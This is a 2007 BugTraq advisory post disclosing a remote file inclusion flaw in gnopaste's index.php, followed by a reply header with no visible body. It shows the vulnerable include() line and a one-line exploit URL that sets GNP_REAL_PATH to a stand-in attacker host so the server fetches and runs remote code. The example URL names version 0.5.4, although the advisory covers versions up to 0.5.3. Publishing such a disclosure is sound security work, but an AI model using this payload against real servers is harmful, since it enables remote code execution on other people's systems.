BugTraq
gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability Jan 29 2007 04:24PM
trzindan hotmail fr (1 replies)
################ t3K t4b4nc4 #################
#
# gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability

# Script site: http://sourceforge.net/projects/gnopaste

# Find by Tr_ZiNDaN

# Greetings; EL_MuHaMMeD,CyberWolf,Crackers_Child,EntriKa,Xyu,Sehzade,
B4ct3ry,M3rhametsiz,Cold Z3ro,e-system,blackwolf,Paradox_
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# T3K T4B4NC4
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: trzindan (at) hotmail (dot) fr [email concealed]
#
##################################################################
file:

index.php

include(GNP_REAL_PATH . 'includes/common.php');

exp:

http://yourdomain.com/gnopaste-0.5.4/index.php?GNP_REAL_PATH=evildode?

##################################################################

[ reply ]
Re: gnopaste <= 0.5.3 (index.php) Remote File Include Vulnerability Jan 29 2007 10:48PM
Francesco Laurita (francesco francesco-laurita info)


 

Privacy Statement
Copyright 2010, SecurityFocus